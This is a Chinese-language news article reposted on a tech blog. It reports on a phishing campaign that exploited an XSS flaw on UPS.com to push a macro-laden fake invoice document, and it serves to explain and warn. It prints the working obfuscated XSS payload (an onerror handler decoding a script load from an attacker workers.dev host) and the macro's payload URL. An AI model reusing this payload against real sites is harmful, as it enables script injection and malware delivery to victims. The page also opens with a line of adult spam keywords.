国产xxxx99真实实拍_久久不雅视频_高清韩国a级特黄毛片_嗯老师别我我受不了了小说

資訊專欄INFORMATION COLUMN

“以假亂真” 網絡釣魚活動巧妙使用 UPS.com XSS 漏洞分發惡意軟件

KoreyLee / 2132人閱讀

摘要:此漏洞允許威脅行為者通過遠程工作人員分發惡意文檔,但使其看起來像是直接從下載的。目前顯示,的跨站漏洞已經修復。而以上釣魚攻擊利用的是中第二普遍的安全問題,存在于近三分之二的應用中。

.markdown-body{word-break:break-word;line-height:1.75;font-weight:400;font-size:15px;overflow-x:hidden;color:#333}.markdown-body%20h1,.markdown-body%20h2,.markdown-body%20h3,.markdown-body%20h4,.markdown-body%20h5,.markdown-body%20h6{line-height:1.5;margin-top:35px;margin-bottom:10px;padding-bottom:5px}.markdown-body%20h1{font-size:30px;margin-bottom:5px}.markdown-body%20h2{padding-bottom:12px;font-size:24px;border-bottom:1px%20solid%20#ececec}.markdown-body%20h3{font-size:18px;padding-bottom:0}.markdown-body%20h4{font-size:16px}.markdown-body%20h5{font-size:15px}.markdown-body%20h6{margin-top:5px}.markdown-body%20p{line-height:inherit;margin-top:22px;margin-bottom:22px}.markdown-body%20img{max-width:100%}.markdown-body%20hr{border:none;border-top:1px%20solid%20#ffffd;margin-top:32px;margin-bottom:32px}.markdown-body%20code{word-break:break-word;border-radius:2px;overflow-x:auto;background-color:#fff5f5;color:#ff502c;font-size:.87em;padding:.065em%20.4em}.markdown-body%20code,.markdown-body%20pre{font-family:Menlo,Monaco,Consolas,Courier%20New,monospace}.markdown-body%20pre{overflow:auto;position:relative;line-height:1.75}.markdown-body%20pre>code{font-size:12px;padding:15px%2012px;margin:0;word-break:normal;display:block;overflow-x:auto;color:#333;background:#f8f8f8}.markdown-body%20a{text-decoration:none;color:#0269c8;border-bottom:1px%20solid%20#d1e9ff}.markdown-body%20a:active,.markdown-body%20a:hover{color:#275b8c}.markdown-body%20table{display:inline-block!important;font-size:12px;width:auto;max-width:100%;overflow:auto;border:1px%20solid%20#f6f6f6}.markdown-body%20thead{background:#f6f6f6;color:#000;text-align:left}.markdown-body%20tr:nth-child(2n){background-color:#fcfcfc}.markdown-body%20td,.markdown-body%20th{padding:12px%207px;line-height:24px}.markdown-body%20td{min-width:120px}.markdown-body%20blockquote{color:#666;padding:1px%2023px;margin:22px%200;border-left:4px%20solid%20#cbcbcb;background-color:#f8f8f8}.markdown-body%20blockquote:after{display:block;content:""}.markdown-body%20blockquote>p{margin:10px%200}.markdown-body%20ol,.markdown-body%20ul{padding-left:28px}.markdown-body%20ol%20li,.markdown-body%20ul%20li{margin-bottom:0;list-style:inherit}.markdown-body%20ol%20li%20.task-list-item,.markdown-body%20ul%20li%20.task-list-item{list-style:none}.markdown-body%20ol%20li%20.task-list-item%20ol,.markdown-body%20ol%20li%20.task-list-item%20ul,.markdown-body%20ul%20li%20.task-list-item%20ol,.markdown-body%20ul%20li%20.task-list-item%20ul{margin-top:0}.markdown-body%20ol%20ol,.markdown-body%20ol%20ul,.markdown-body%20ul%20ol,.markdown-body%20ul%20ul{margin-top:3px}.markdown-body%20ol%20li{padding-left:6px}.markdown-body%20.contains-task-list{padding-left:0}.markdown-body%20.task-list-item{list-style:none}@media%20(max-width:720px){.markdown-body%20h1{font-size:24px}.markdown-body%20h2{font-size:20px}.markdown-body%20h3{font-size:18px}}

一個巧妙的網絡釣魚活動利用UPS.com中的XSS漏洞來推送虛假和惡意的“發票”Word%20文檔。

UPS快遞公司(UPS%20Express,聯合包裹服務公司)是世界上最大的快遞承運商與包裹遞送公司。公司創辦1907年,每天在全球200多個國家和地區提供物流服務,年營業額超過500億美元。

網絡釣魚騙局最初是由安全研究人員丹尼爾·加拉格爾發現的,他假裝是一封來自UPS的電子郵件,聲稱一個包裹有“例外”,需要客戶取走。

這次網絡釣魚攻擊的突出之處在于,威脅行為者利用UPS.com的跨站攻擊漏洞,將該網站的常規頁面修改為看起來像一個合法的下載頁面。

此漏洞允許威脅行為者通過遠程Cloudflare工作人員分發惡意文檔,但使其看起來像是直接從UPS.com下載的。

剖析%20UPS%20網絡釣魚騙局

這個電子郵件充滿了大量的合法鏈接,沒有執行惡意行為。然而,這個追蹤號碼是一個鏈接到UPS網站的鏈接,其中包含一個XSS漏洞,當頁面打開時,該漏洞會向瀏覽器注入惡意JavaScript。

UPS 網絡釣魚電子郵件

當前無法加載圖像,因為攻擊者的站點已關閉

下面可以看到用于跟蹤號碼的URL經過清理后的版本,原始的URL被進一步混淆了。

網絡釣魚詐騙中使用的URL

這個URL有兩個有趣的字符串用作攻擊的一部分,其中第一項是以下base64編碼的字符串:

MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==

base64字符串包含來自威脅參與者的注釋,該注釋有助于解釋該字符串用于使URL變長,以隱藏附加到URL末尾的XSS利用查詢參數。

1%20jU57%20N33d%2070%20m4K3%207h15%20URL%204%20l177l3%20L0n93r%2070%20H1D3%20n3x7%20qU3rY%20P4R4M,%20y0u%204LR34Dy%20Kn0w%20WhY%20;)

第二點是當用戶訪問UPS.com網站時注入的JavaScript跨站漏洞。

img%20src="x"%20onerror="Function(atob("JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=="))()

atob()函數中解碼的base64字符串包含Cloudflare工作人員腳本的URL,該漏洞將加載該腳本。

$.getScript("

Gallagher在Urlscan上捕獲的Cloudflare工作人員腳本,將導致UPS頁面顯示一條消息,表明有文件正在下載。

Cloudflare 工作腳本用作 UPS XSS 攻擊的一部分

XSS漏洞注入的Cloudflare worker腳本將導致UPS網站顯示下載頁面,如下所示。

利用導致UPS頁面顯示下載屏幕

最終,該頁面將從攻擊者的Cloudflare項目下載惡意的Word文檔[VirusTotal]。

這種網絡釣魚活動手段非常聰明,因為用戶訪問URL將看到一個合法的ups.com%20URL提示下載發票,這種策略可能會使受害者在打開發票時少一些懷疑,認為這是UPS的真實文件。

目前顯示,UPS.com的跨站漏洞已經修復。

神秘的假“發票”文件

下載的文件名為“invoice_1Z7301XR1412220178”,假裝是UPS的運輸發票。當打開文檔時,所有文本都將無法讀取,并且文檔會提示用戶“啟用內容”以正確查看它。

惡意發票word文檔

啟用后,宏將嘗試下載文件divine-bar-3d75.visual-candy.workers.dev/blackhole.p…

但是,此URL不再有效,因此無法查看有效負載。

偽造的 UPS 發票中的宏

這種網絡釣魚騙局說明了威脅行為者在散布惡意文件時,不斷在發展和創新其技術手段,雖然郵件發送者清楚地顯示了一個可疑域名,但由XSS漏洞允許URL和下載頁面從UPS合法出現,這會讓很多人信以為真。

根據CNVD(國家信息安全漏洞共享平臺)統計,軟件漏洞比例最高占全部網絡漏洞的80%,而在OWASP TOP 10安全漏洞中,60-70%的安全漏洞類型都是通過源代碼靜態分析技術檢測出來的,如XSS、注入漏洞、XXE等。而以上釣魚攻擊利用的XSS是OWASP TOP 10中第二普遍的安全問題,存在于近三分之二的應用中。自動化技術可以自動發現一些XSS問題,特別是在一些成熟的技術中,如PHP、ASP.NET等。因此在軟件開發過程中,為了加強網絡安全建設提高軟件安全性,有必要通過靜態代碼檢測等工具檢測代碼缺陷及運行時缺陷,并查找更多的已知/未知深度安全漏洞并及時修復,這不但為現有的網絡防護手段做好重要補充,而且也能將安全問題修復成本降至最低。

參讀鏈接:

www.woocoom.com/b021.html?i…

www.bleepingcomputer.com/news/securi…

www.99lb.net/8382b.html

文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。

轉載請注明本文地址:http://m.specialneedsforspecialkids.com/yun/118560.html

相關文章

  • 金融科技行業網絡安全威脅概覽

    摘要:在眾多端點威脅中,針對金融部門的最常見的持續攻擊是網絡釣魚和勒索軟件攻擊。通過研究,影響金融行業的勒索軟件攻擊和數據泄露的趨勢表明,勒索軟件組是最活躍的。針對金融機構的累計攻擊次數達起,涉及個勒索軟件組織。 .markdown-body{word-break:break-word;line-height:1.75;font-weight:400;font-size:15px;ove...

    xietao3 評論0 收藏0
  • [面試專題]前端需要知道的web安全知識

    摘要:攻擊方式端口掃描攻擊洪水攻擊洪水攻擊跳轉攻擊防范手段保證服務器系統的安全確保服務器軟件沒有任何漏洞,防止攻擊者入侵。 前端需要知道的web安全知識 標簽(空格分隔): 未分類 安全 [Doc] Crypto (加密) [Doc] TLS/SSL [Doc] HTTPS [Point] XSS [Point] CSRF [Point] 中間人攻擊 [Point] Sql/Nosql ...

    ivydom 評論0 收藏0

發表評論

0條評論

最新活動
閱讀需要支付1元查看
<